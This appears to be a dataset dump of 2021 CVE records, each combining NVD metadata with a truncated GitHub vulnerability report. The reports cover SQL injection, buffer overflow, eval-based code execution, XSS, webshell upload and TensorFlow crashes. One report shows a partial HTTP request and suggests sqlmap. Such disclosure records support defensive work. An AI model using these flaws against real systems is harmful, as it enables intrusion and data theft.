] | 89 | https://github.com/harshitbansal373/PHP-CMS/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"harshitbansal373",
"PHP-CMS"
] | In search.php,there's a SQL injection vulnerability in parameter,search.This parameter is transmitted using POST,you can use sqlmap to enter the database.
```
POST /search.php HTTP/1.1
Host: localhost:8082
Connection: keep-alive
Content-Length: 18
Cache-Control: max-age=0
Origin: http://localhost:8082
Upgrade-... | SQL injection vulnerability in search.php | https://api.github.com/repos/harshitbansal373/PHP-CMS/issues/1/comments | 0 | 2019-06-14T09:29:32Z | 2019-06-14T09:29:32Z | https://github.com/harshitbansal373/PHP-CMS/issues/1 | 456,150,677 | 1 | 2,755 |
CVE-2021-42624 | 2021-11-04T11:15:07.640 | A local buffer overflow vulnerability exists in the latest version of Miniftpd in ftpproto.c through the tmp variable, where a crafted payload can be sent to the affected function. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Gabe-commiter/Miniftpd/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gi... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:miniftpd_project:miniftpd:-:*:*:*:*:*:*:*",
"matchCriteriaId": "A4D33EF1-0E4E-4005-B938-D75E8BAA31F9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStart... | [
"120"
] | 120 | https://github.com/Gabe-commiter/Miniftpd/issues/4 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Gabe-commiter",
"Miniftpd"
] | Hi @Gabe-commiter,
I found a issue, that can trigger buffer overflow on your application. The issue exists on list_common() function (from line 437 to 484) on ftpproto.c
By reading line by line, we can see you using sprintf() in your application. The problem appears when you defined buf and tmp variables both hav... | sprintf() trigger buffer overflow on list_common() function | https://api.github.com/repos/Gabe-commiter/Miniftpd/issues/4/comments | 0 | 2021-10-13T12:01:47Z | 2021-10-13T12:02:45Z | https://github.com/Gabe-commiter/Miniftpd/issues/4 | 1,025,158,824 | 4 | 2,756 |
CVE-2021-42057 | 2021-11-04T21:15:09.080 | Obsidian Dataview through 0.4.12-hotfix1 allows eval injection. The evalInContext function in executes user input, which allows an attacker to craft malicious Markdown files that will execute arbitrary code once opened. NOTE: 0.4.13 provides a mitigation for some use cases. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPL... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/blacksmithgu/obsidian-dataview/issues/615"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:obsidian:obsidian_dataview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9CB8353D-A92C-4981-841F-1875BE26031F",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.11",
"version... | [
"94"
] | 94 | https://github.com/blacksmithgu/obsidian-dataview/issues/615 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"blacksmithgu",
"obsidian-dataview"
] | ## Describe the bug
I discovered a way to craft malicious markdown files that will cause the obsidian-dataview plugin to execute arbitrary commands on users’ systems. This is due to the unsafe use of eval within the [evalInContext](https://github.com/blacksmithgu/obsidian-dataview/blob/f897a178a678c2fa625de018c67224... | Arbitrary Code Execution via JavaScript Queries (CVE-2021-42057) | https://api.github.com/repos/blacksmithgu/obsidian-dataview/issues/615/comments | 17 | 2021-11-04T19:08:34Z | 2022-09-30T23:17:56Z | https://github.com/blacksmithgu/obsidian-dataview/issues/615 | 1,045,109,271 | 615 | 2,757 |
CVE-2021-43398 | 2021-11-04T21:15:09.520 | Crypto++ (aka Cryptopp) 8.6.0 and earlier contains a timing leakage in MakePublicKey(). There is a clear correlation between execution time and private key length, which may cause disclosure of the length information of the private key. This might allow attackers to conduct timing attacks. NOTE: this report is disputed... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://cryptopp.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/weidai11/cryptopp/issues/1080"
},
{
"source": "cve@mitre.o... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cryptopp:crypto\\+\\+:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38083732-7F2F-45F1-B773-8BD7A039F08B",
"versionEndExcluding": null,
"versionEndIncluding": "8.6.0",
"versionStartE... | [
"203"
] | 203 | https://github.com/weidai11/cryptopp/issues/1080 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"weidai11",
"cryptopp"
] | I'm using Crypto++ built by the latest version of source code in this repository on Ubuntu 18.04.
The function is as follows:
```c++
void ECC_PrivatetoPublic(string priv){
using namespace CryptoPP;
clock_t start, finish;
ECDSA<ECP, SHA256>::PrivateKey privateKey;
ECDSA<ECP, SHA256>::PublicKey ... | Correlation Between Key Length and Execution Time | https://api.github.com/repos/weidai11/cryptopp/issues/1080/comments | 14 | 2021-10-28T08:39:07Z | 2022-08-17T12:24:58Z | https://github.com/weidai11/cryptopp/issues/1080 | 1,038,244,979 | 1,080 | 2,758 |
CVE-2021-43398 | 2021-11-04T21:15:09.520 | Crypto++ (aka Cryptopp) 8.6.0 and earlier contains a timing leakage in MakePublicKey(). There is a clear correlation between execution time and private key length, which may cause disclosure of the length information of the private key. This might allow attackers to conduct timing attacks. NOTE: this report is disputed... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://cryptopp.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/weidai11/cryptopp/issues/1080"
},
{
"source": "cve@mitre.o... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cryptopp:crypto\\+\\+:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38083732-7F2F-45F1-B773-8BD7A039F08B",
"versionEndExcluding": null,
"versionEndIncluding": "8.6.0",
"versionStartE... | [
"203"
] | 203 | https://github.com/weidai11/cryptopp/issues/1080#issuecomment-996492222 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weidai11",
"cryptopp"
] | I'm using Crypto++ built by the latest version of source code in this repository on Ubuntu 18.04.
The function is as follows:
```c++
void ECC_PrivatetoPublic(string priv){
using namespace CryptoPP;
clock_t start, finish;
ECDSA<ECP, SHA256>::PrivateKey privateKey;
ECDSA<ECP, SHA256>::PublicKey ... | Correlation Between Key Length and Execution Time | https://api.github.com/repos/weidai11/cryptopp/issues/1080/comments | 14 | 2021-10-28T08:39:07Z | 2022-08-17T12:24:58Z | https://github.com/weidai11/cryptopp/issues/1080 | 1,038,244,979 | 1,080 | 2,759 |
CVE-2021-39416 | 2021-11-05T16:15:07.710 | Multiple Cross Site Scripting (XSS) vulnerabilities exists in Remote Clinic v2.0 in (1) patients/register-patient.php via the (a) Contact, (b) Email, (c) Weight, (d) Profession, (e) ref_contact, (f) address, (g) gender, (h) age, and (i) serial parameters; in (2) patients/edit-patient.php via the (a) Contact, (b) Email,... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
... | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/remoteclinic/RemoteClinic/issues/17"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://remoteclinic.io"
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionSt... | [
"79"
] | 79 | https://github.com/remoteclinic/RemoteClinic/issues/17 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"remoteclinic",
"RemoteClinic"
] | In Remote Clinic v2.0, there are multiple Cross-Site Scripting vulnerabilities via the Contact, Email, Weight, Profession, ref_contact, and address parameters in /patients/register-patient.php are vulnerable due to the _POSTs not being sanitized properly for XSS despite being sent through the friendly function.
In ... | Multiple Cross Site Scripting Vulnerabilities in Remote Clinic V2.0 | https://api.github.com/repos/remoteclinic/RemoteClinic/issues/17/comments | 2 | 2021-08-16T11:38:23Z | 2022-03-04T13:49:45Z | https://github.com/remoteclinic/RemoteClinic/issues/17 | 971,647,775 | 17 | 2,760 |
CVE-2021-41195 | 2021-11-05T20:15:07.707 | TensorFlow is an open source platform for machine learning. In affected versions the implementation of `tf.math.segment_*` operations results in a `CHECK`-fail related abort (and denial of service) if a segment id in `segment_ids` is large. This is similar to CVE-2021-29584 (and similar other reported vulnerabilities i... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/e9c81c1e1a9cd8dd31f4e83676cab61b60658429"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExclu... | [
"190"
] | 190 | https://github.com/tensorflow/tensorflow/issues/46888 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow i... | tf.math.segment_max/min/mean/sun/prod crashes(aborts) when segment_ids is large | https://api.github.com/repos/tensorflow/tensorflow/issues/46888/comments | 4 | 2021-02-03T16:47:27Z | 2021-10-28T00:38:23Z | https://github.com/tensorflow/tensorflow/issues/46888 | 800,507,514 | 46,888 | 2,761 |
CVE-2021-41196 | 2021-11-05T20:15:07.780 | TensorFlow is an open source platform for machine learning. In affected versions the Keras pooling layers can trigger a segfault if the size of the pool is 0 or if a dimension is negative. This is due to the TensorFlow's implementation of pooling operations where the values in the sliding window are not checked to be s... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/12b1ff82b3f26ff8de17e58703231d5a02ef1b8b"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Thir... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExclu... | [
"191"
] | 191 | https://github.com/tensorflow/tensorflow/issues/51936 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): yes
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: n/a
- TensorFlow ... | tf.keras.layers.MaxPooling3D crashes | https://api.github.com/repos/tensorflow/tensorflow/issues/51936/comments | 8 | 2021-09-10T21:36:31Z | 2023-09-21T10:18:55Z | https://github.com/tensorflow/tensorflow/issues/51936 | 993,613,787 | 51,936 | 2,762 |
CVE-2021-41197 | 2021-11-05T20:15:07.843 | TensorFlow is an open source platform for machine learning. In affected versions TensorFlow allows tensor to have a large number of dimensions and each dimension can be as large as desired. However, the total number of elements in a tensor must fit within an `int64_t`. If an overflow occurs, `MultiplyWithoutOverflow` w... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExclu... | [
"190"
] | 190 | https://github.com/tensorflow/tensorflow/issues/46890 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow i... | tf.image.resize/resize_with_crop_or_pad/pad_to_bounding_box/extract_glimpse crash(abort) | https://api.github.com/repos/tensorflow/tensorflow/issues/46890/comments | 8 | 2021-02-03T17:44:30Z | 2021-10-27T23:23:50Z | https://github.com/tensorflow/tensorflow/issues/46890 | 800,555,472 | 46,890 | 2,763 |
CVE-2021-41197 | 2021-11-05T20:15:07.843 | TensorFlow is an open source platform for machine learning. In affected versions TensorFlow allows tensor to have a large number of dimensions and each dimension can be as large as desired. However, the total number of elements in a tensor must fit within an `int64_t`. If an overflow occurs, `MultiplyWithoutOverflow` w... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/7c1692bd417eb4f9b33ead749a41166d6080af85"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExclu... | [
"190"
] | 190 | https://github.com/tensorflow/tensorflow/issues/51908 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): Yes
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow ... | tf.pad crashes with large paddings | https://api.github.com/repos/tensorflow/tensorflow/issues/51908/comments | 4 | 2021-09-09T18:05:47Z | 2021-09-13T00:39:36Z | https://github.com/tensorflow/tensorflow/issues/51908 | 992,494,182 | 51,908 | 2,764 |
CVE-2021-41198 | 2021-11-05T20:15:07.907 | TensorFlow is an open source platform for machine learning. In affected versions if `tf.tile` is called with a large input argument then the TensorFlow process will crash due to a `CHECK`-failure caused by an overflow. The number of elements in the output tensor is too much for the `int64_t` type and the overflow is de... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/9294094df6fea79271778eb7e7ae1bad8b5ef98f"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Thir... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExclu... | [
"190"
] | 190 | https://github.com/tensorflow/tensorflow/issues/46911 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow i... | tf.keras.backend.tile crash(aborts) when n is large | https://api.github.com/repos/tensorflow/tensorflow/issues/46911/comments | 4 | 2021-02-04T04:10:44Z | 2021-09-21T01:51:59Z | https://github.com/tensorflow/tensorflow/issues/46911 | 800,911,545 | 46,911 | 2,765 |
CVE-2021-41199 | 2021-11-05T20:15:07.970 | TensorFlow is an open source platform for machine learning. In affected versions if `tf.image.resize` is called with a large input argument then the TensorFlow process will crash due to a `CHECK`-failure caused by an overflow. The number of elements in the output tensor is too much for the `int64_t` type and the overfl... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/e5272d4204ff5b46136a1ef1204fc00597e21837"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Thir... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExclu... | [
"190"
] | 190 | https://github.com/tensorflow/tensorflow/issues/46914 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow i... | tf.keras.layers.UpSampling2D crashes(aborts) when size is large | https://api.github.com/repos/tensorflow/tensorflow/issues/46914/comments | 5 | 2021-02-04T04:45:22Z | 2023-09-21T09:20:32Z | https://github.com/tensorflow/tensorflow/issues/46914 | 800,926,370 | 46,914 | 2,766 |
CVE-2021-41200 | 2021-11-05T20:15:08.037 | TensorFlow is an open source platform for machine learning. In affected versions if `tf.summary.create_file_writer` is called with non-scalar arguments code crashes due to a `CHECK`-fail. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorF... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/874bda09e6702cd50bac90b453b50bcc65b2769e"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Thir... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExclu... | [
"617"
] | 617 | https://github.com/tensorflow/tensorflow/issues/46909 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow i... | tf.summary.create_file_writer aborts | https://api.github.com/repos/tensorflow/tensorflow/issues/46909/comments | 4 | 2021-02-04T03:59:44Z | 2021-08-31T23:59:30Z | https://github.com/tensorflow/tensorflow/issues/46909 | 800,906,740 | 46,909 | 2,767 |
CVE-2021-41202 | 2021-11-05T22:15:08.323 | TensorFlow is an open source platform for machine learning. In affected versions while calculating the size of the output within the `tf.range` kernel, there is a conditional statement of type `int64 = condition ? int64 : double`. Due to C++ implicit conversion rules, both branches of the condition will be cast to `dou... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0E596567-6F67-4880-8EC4-CB262BF02E0D",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExclu... | [
"681"
] | 681 | https://github.com/tensorflow/tensorflow/issues/46889 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow i... | tf.keras.backend.arange crash (abort) when start is large | https://api.github.com/repos/tensorflow/tensorflow/issues/46889/comments | 4 | 2021-02-03T16:54:54Z | 2021-08-30T20:46:03Z | https://github.com/tensorflow/tensorflow/issues/46889 | 800,513,778 | 46,889 | 2,768 |
CVE-2021-41202 | 2021-11-05T22:15:08.323 | TensorFlow is an open source platform for machine learning. In affected versions while calculating the size of the output within the `tf.range` kernel, there is a conditional statement of type `int64 = condition ? int64 : double`. Due to C++ implicit conversion rules, both branches of the condition will be cast to `dou... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/1b0e0ec27e7895b9985076eab32445026ae5ca94"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third ... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0E596567-6F67-4880-8EC4-CB262BF02E0D",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExclu... | [
"681"
] | 681 | https://github.com/tensorflow/tensorflow/issues/46912 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow i... | `tf.sparse.eye` crashes(aborts) when num_rows contains large number | https://api.github.com/repos/tensorflow/tensorflow/issues/46912/comments | 4 | 2021-02-04T04:39:54Z | 2021-08-19T04:41:31Z | https://github.com/tensorflow/tensorflow/issues/46912 | 800,924,135 | 46,912 | 2,769 |
CVE-2021-41170 | 2021-11-08T19:15:07.640 | neoan3-apps/template is a neoan3 minimal template engine. Versions prior to 1.1.1 have allowed for passing in closures directly into the template engine. As a result values that are callable are executed by the template engine. The issue arises if a value has the same name as a method or function in scope and can there... | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",... | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/sroehrl/neoan3-template/commit/4a2c9570f071d3c8f4ac790007599cba20e16934"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:neoan:neoan3-template:*:*:*:*:*:*:*:*",
"matchCriteriaId": "70999503-021D-444B-95AD-548CE2C0E680",
"versionEndExcluding": "1.1.1",
"versionEndIncluding": null,
"versionStartE... | [
"732"
] | 732 | https://github.com/sroehrl/neoan3-template/issues/8 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"sroehrl",
"neoan3-template"
] | In the template evaluation, closures are evaluated based on whether a value is callable within the current scope.
In theory, one could create a multi-step attack by storing particular values into the database that are known to be eventually rendered by the template engine. would the value of such a key happen to be a ... | Closure injection has a vulnerability | https://api.github.com/repos/sroehrl/neoan3-template/issues/8/comments | 0 | 2021-10-21T23:24:03Z | 2021-10-21T23:48:25Z | https://github.com/sroehrl/neoan3-template/issues/8 | 1,033,019,897 | 8 | 2,770 |
CVE-2020-23572 | 2021-11-08T21:15:07.527 | BEESCMS v4.0 was discovered to contain an arbitrary file upload vulnerability via the component /admin/upload.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PART... | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/source-trace/beescms/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third... | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:beescms:beescms:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "25C27AEE-DD4E-4006-8DD1-E4A6160F4D43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcludin... | [
"434"
] | 434 | https://github.com/source-trace/beescms/issues/6 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"source-trace",
"beescms"
] | Let's take a look at the code

Because the system does not strictly filter and restrict the pictures uploaded by users, resulting in file upload vulnerabilities. From the code, it can be seen that only the size ... | There is a file upload vulnerability so that the webshell can be obtained | https://api.github.com/repos/source-trace/beescms/issues/6/comments | 0 | 2020-06-08T06:58:15Z | 2020-06-08T06:58:15Z | https://github.com/source-trace/beescms/issues/6 | 634,257,773 | 6 | 2,771 |
CVE-2020-23872 | 2021-11-10T22:15:07.470 | A NULL pointer dereference in the function TextPage::restoreState of pdf2xml v2.0 allows attackers to cause a denial of service (DoS). | {
"cvssMetricV2": [
